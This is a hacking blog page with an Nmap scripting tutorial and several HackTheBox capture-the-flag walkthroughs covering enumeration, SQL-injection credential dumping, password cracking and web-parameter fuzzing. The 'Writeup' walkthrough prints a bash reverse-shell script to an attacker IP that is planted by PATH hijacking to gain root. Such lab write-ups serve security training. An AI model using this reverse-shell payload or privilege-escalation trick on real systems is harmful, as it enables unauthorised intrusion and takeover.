Here, you’ll find all the latest hacking news from around the world.

Thursday, December 31, 2020

Nmap' scripts categories - full potential unleashed



I know that almost all of you may already know that Nmap provides the use of scripts for doing analysis of the target. Many of us just add the option "-sC" and go, right? no.
These runs only the default scripts, a subcategory of them, that are roughly 120

Every one of us uses Nmap but not everyone knows the full potential of the Nmap' scripts.
In this article, we will take a deeper look at the scripts and the full potential of nmap.

First of all, where are the scripts stored, and what type of scripts we have at disposal.


This command will show you the different category:

grep -r categories /usr/share/nmap/scripts/*.nse | cut -d ":" -f 2 | grep -oP '"(.*?)"' | sort -u



If you're against a smb service like often happens, and you run the -sC option, you'll never see if it is vulnerable to MS17-010 or better known as eternal blue. Its script falls under the category of "vuln" and "safe", not the "default".


Nmap allows the use of scripts simply adding the "--script" option. 
This option can take : 

1. script name
2. NSE category
3. Path to an NSE file
4. Folder containing scripts
5. An expression

Expressions allow incredible flexibility when selecting scripts, as we will see in the following sections.


> Selecting by script name or category



To select a whole category, simply use the name of the category as the argument. 
For example to run the exploit category use the following command:

nmap --script exploit <target>


You can also run several categories by separating them with a comma:

nmap --script discovery,intrusive <target>


> Selecting by filename or folder



In order to execute an NSE script file, we can use this syntax:

nmap --script /path/to/script.nse <target>


Similarly, with categories you can execute several scripts by separating paths with a comma:

nmap --script /path/to/script.nse,/another/path/script2.nse <target>


To execute all the scripts contained in a folder, we only need to pass the folder name as an argument:

nmap --script /path/to/folder/ <target>


> Advanced script selection with expressions



Expressions are used to describe set of scripts. We'll go now through different scenarios where we can take advantage of script selection.

In this example the not exploit expression will match any script that does not belong to the exploit category:

nmap -sV --script "not exploit" <target>


The OR and AND operators allow constructing more complex and logic expressions. The following expression will match any script that is not inside the intrusive, dos or exploit categories:

nmap --script "not(intrusive or dos or exploit)" -sV <target>


If we would like to execute all scripts within the broadcast and discovery categories, we'll use:

nmap --script "broadcast and discovery" <target>


If you are selecting scripts, you can also use the wildcard character, *:

nmap --script "snmp-*" <target>


Of course, we can combine wildcards and expressions. For example, let's run all the scripts whose names contain http, but exclude some kind of scripts like http-slowloris, http-brute, http-form-fuzzer or http-enum:

nmap --script "*http* and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" <target>


We can also combine wildcarded filters with expressions when selecting categories. The next command executes all scripts whose names begin with http- that are not in the exploit category:

nmap --script "http-* and not(exploit)" <target>


> NSE script arguments



The --script-args Nmap option is used to set arguments in NSE scripts. For example, if we would like to set the http library argument "user agent", we can run:

nmap -sV --script http-title --script-args http.useragent="Mozilla 1337" <target>


Not a lot of Nmap users know this but we can also omit the script name when setting arguments:

nmap -p80 --script http-trace --script-args path <target>

We can use the preceding expression instead of using this:

nmap -p80 --script http-trace --script-args http-trace.path <target>


> Loading script arguments from a file



If you are planning to run several scans, it is probably a good idea to write down your script arguments in a file to save some typing. NSE supports loading NSE arguments from an absolute or relative path with the --script-args-file option. 

The arguments contained in the file must be separated by commas or new lines:


nmap --script "discovery,broadcast" --script-args-file nmap-args.txt <target>


nmap-args.txt
_____________________________________________________

1 |http.useragent=Not Nmap
2 |http.max-connections=50
3 |userdb=/path/to/usernames.lst
4 |passdb=/path/to/dictionary.lst
_____________________________________________________

> Forcing the execution of NSE scripts


Let's talk about how to force the execution of particular scripts.

Nmap can force the execution of a NSE script by pretending a "+" to the script name:

nmap --script +<script selection> <<arg1, arg2, …>>


If we want to force the execution of the only http-title NSE script against the service running on port 1212, thus saving a lot of time, we can run : 

nmap --script +http-title -p1212 192.168.1.210


Without the "+" sign, the script will not run but, since we added it, the report comes back with the following:

_____________________________________________________

1 |Nmap scan report for 192.168.1.210
2 |Host is up (0.00026s latency).
3 | PORT     STATE SERVICE
4 | 1212/tcp open  lupa
5 ||_http-title: W00t!
_____________________________________________________

> Debugging NSE scripts



If you need to analyze the traffic sent and received by NSE, use the --script-trace option. For example, if you would like to see the payloads sent by the NSE scripts in the exploit category, you can use this expression:

nmap --script exploit --script-trace <target>


You can also turn on the debug mode of Nmap with the -d[1-9] flag. This flag can be followed by an integer that denotes the debug level and should be between 1 and 9. The higher the level, the more verbose is the output. Here an example with a mid level :

nmap -sV –-script exploit -d4 <target> 


The --packet-trace option includes all the packets sent and received, not only the traffic generated by NSE. Useful when it comes to analyzing what we're actually doing :

nmap -O --script myscript.nse --packet-trace <target>


See you next time with an article on an awesome smb exploit using all nmap' potential!




-G4d4r3L-

Share:

Wednesday, December 30, 2020

Hackthebox Writeup




User

As always, I started with an nmap scan which revealed two ports open, port 22 (SSH) and port 80 (HTTP).


Visiting port 80 showed a very simple page and nothing else. No links, nothing. Well, except for a warning that I’d be banned if I hit a lot of 404 pages, so no gobuster or similar brute forcing was going to work here.


Fortunately, checking robots.txt gave me something to work on, as it didn’t want me to visit /writeup. Which is exactly what I did!
There wasn’t much of interest in /writeup, but wappalyzer (a Firefox plugin) identified the software running as ‘CMS Made Simple’. Something which exploit-db has several exploits for.
I found an SQL injection exploit which didn’t need any valid credentials, and since I wasn’t able to identify the version of CMS Made Simple running, I decided to give it a try.
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
Within a short time the exploit had extracted a username, and the salt and hash for the password. Using hashcat with mode 20 (md5($salt.$pass)) I got the password ‘raykayjay9’ which allowed me to log in via SSH and grab the user flag.

root

For root, I did the usual and fetched LinEnum and pspy and ran them. I didn’t initially notice anything with these tools, so I ran pspy with the parameters -fp to see all file system events.
When someone ssh’d into the box, sshd would call run-parts without a specific path, looking in the following dirs in the PATH variable:

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Checking if any of these directories were writable showed that both /usr/local/sbin and /usr/local/bin were. So what would happen if I were to put an executable script called ‘run-parts’ into either of the above dirs?
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.10/9001 0>&1
Running chmod +x to make the above script executable and starting a reverse netcat listener

nc -lvnp 9001
All I had to do was log in via SSH again, and I had a reverse root shell and could grab the root flag!

Share:

Tuesday, December 29, 2020

Magic Hackthebox

 



Welcome Readers, Today we will be doing the hack the box (HTB) challenge

Enumeration

Starting off with a little nmap, we see SSH and HTTP open.

root@kali:~/Documents/HackTheBox/Magic# nmap -Pn -sS -n -p1-10000 -T4 -sV 10.10.10.185 -vv
...
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
...
A quick check for OpenSSH v7.6p1 vulnerabilities doesn’t seem to give us anything, so let’s move on to port 80.
At first glance, there are just a bunch of images on the site - nothing too interesting. Of note in the source code, however, are references to images located in images/uploads. This will be useful later.



Next, in the bottom left corner there is a login button which will presumably let us upload images, so let’s try that.

Next, in the bottom left corner there is a login button which will presumably let us upload images, so let’s try that.

Foothold

Now, we are presented with a very simple login dialog box. The login process appears to be pretty standard in that it POSTs a username and password to the PHP backend.



Since we don’t know the username or password, let’s try SQL injection in both fields. The idea here is that the PHP code in the back may look something like this:

Since we don’t know the username or password, let’s try SQL injection in both fields. The idea here is that the PHP code in the back may look something like this:
...


Share:

Fuzzy HackTheBox WEB (Test)


Welcome Readers, Today we will be doing the hack the box (HTB) challenge

Finding the Page

We have this nice website in front of us..


Let’s start off with our basic gobuster..

Command

gobuster -u http://docker.hackthebox.eu:42566/ -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm

Command Explanation

    -w (wordlist)
    -t (50 threads)
    -x (Look for these extensions in the bruteforce)

    OUTPUT

    [rikozi@rikozi tmp]$ gobuster -u http://docker.hackthebox.eu:42566/ -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm
    
    =====================================================
    Gobuster v2.0.1              
    =====================================================
    [+] Mode         : dir
    [+] Url/Domain   : http://docker.hackthebox.eu:42566/
    [+] Threads      : 50
    [+] Wordlist     : /usr/share/dirbuster/directory-list-2.3-medium.txt
    [+] Status codes : 200,204,301,302,307,403
    [+] Extensions   : htm,php,txt,html
    [+] Timeout      : 10s
    =====================================================
    2020/12/11 00:48:35 Starting gobuster
    =====================================================
    /index.html (Status: 200)
    /css (Status: 301)
    /js (Status: 301)
    /api (Status: 301)

    Now we got an interesting directory named api let’s gobuster this now…

    Command

    gobuster -u http://docker.hackthebox.eu:42566/api/ -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm

    OUTPUT

    [rikozi@rikozi tmp]$ gobuster -u http://docker.hackthebox.eu:42566/api/ -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm
    
    =====================================================
    Gobuster v2.0.1              
    =====================================================
    [+] Mode         : dir
    [+] Url/Domain   : http://docker.hackthebox.eu:42566/api/
    [+] Threads      : 50
    [+] Wordlist     : /usr/share/dirbuster/directory-list-2.3-medium.txt
    [+] Status codes : 200,204,301,302,307,403
    [+] Extensions   : php,txt,html,htm
    [+] Timeout      : 10s
    =====================================================
    2020/12/11 00:50:53 Starting gobuster
    =====================================================
    /index.html (Status: 200)
    /action.php (Status: 200)

    We found the action.php Let’s see what we have on this one …



    Error: Parameter not set

    So now we need to find the GET parameter which will be used at this endpoint

    Finding the parameter

    For this we will use wfuzz which can be found here

    Command

    wfuzz --hh=24 -c  -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:42566/api/action.php?FUZZ=test
    

    Command Explanation

      • –hh (filter the length of characters in source code)
      • -c (Output with colors)
      • -w (Wordlist)
      • FUZZ (FUZZ keyword will be replaced by the word from the wordlist)
      [rikozi@rikozi tmp]$ wfuzz --hh=24 -c  -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:42566/api/action.php?FUZZ=test 
      ********************************************************
      * Wfuzz 2.4 - The Web Fuzzer                           *
      ********************************************************
      
      Target: http://docker.hackthebox.eu:42566/api/action.php?FUZZ=test
      Total requests: 20469
      
      ===================================================================
      ID           Response   Lines    Word     Chars       Payload                                                               
      ===================================================================
      
      000015356:   200        0 L      5 W      27 Ch       "reset"                                                               
      
      Total time: 399.9509
      Processed Requests: 20469
      Filtered Requests: 20468
      Requests/sec.: 51.17877

      Now we have found our parameter which is reset let’s see what this parameter gives us …

      Error: Account ID not found

      Now we will have to bruteforce the Account ID

      Finding Account ID

      We will again use wfuzz for it but this time we will set the character length to 27 (You can find this by simply counting it)…

      Command

      wfuzz --hh=27 -c  -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:42566/api/action.php?reset=FUZZ
      
      OUTPUT

      [rikozi@rikozi tmp]$ wfuzz --hh=27 -c  -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:42566/api/action.php?reset=FUZZ
      ********************************************************
      * Wfuzz 2.4 - The Web Fuzzer                           *
      ********************************************************
      
      Target: http://docker.hackthebox.eu:42566/api/action.php?reset=FUZZ
      Total requests: 20469
      
      ===================================================================
      ID           Response   Lines    Word     Chars       Payload                                                               
      ===================================================================
      
      000000318:   200        0 L      10 W     74 Ch       "20"

      So we got the account ID let’s finalise the url and see what’s the output…

      URL:-http://docker.hackthebox.eu:42566/api/action.php?reset=20
      
      And we got the flag

      Thank you guys if you like this writeup stay tuned for more !!

      this just test, original writing source





      Share:

      Contact us

      Name

      Email *

      Message *

      Theme Support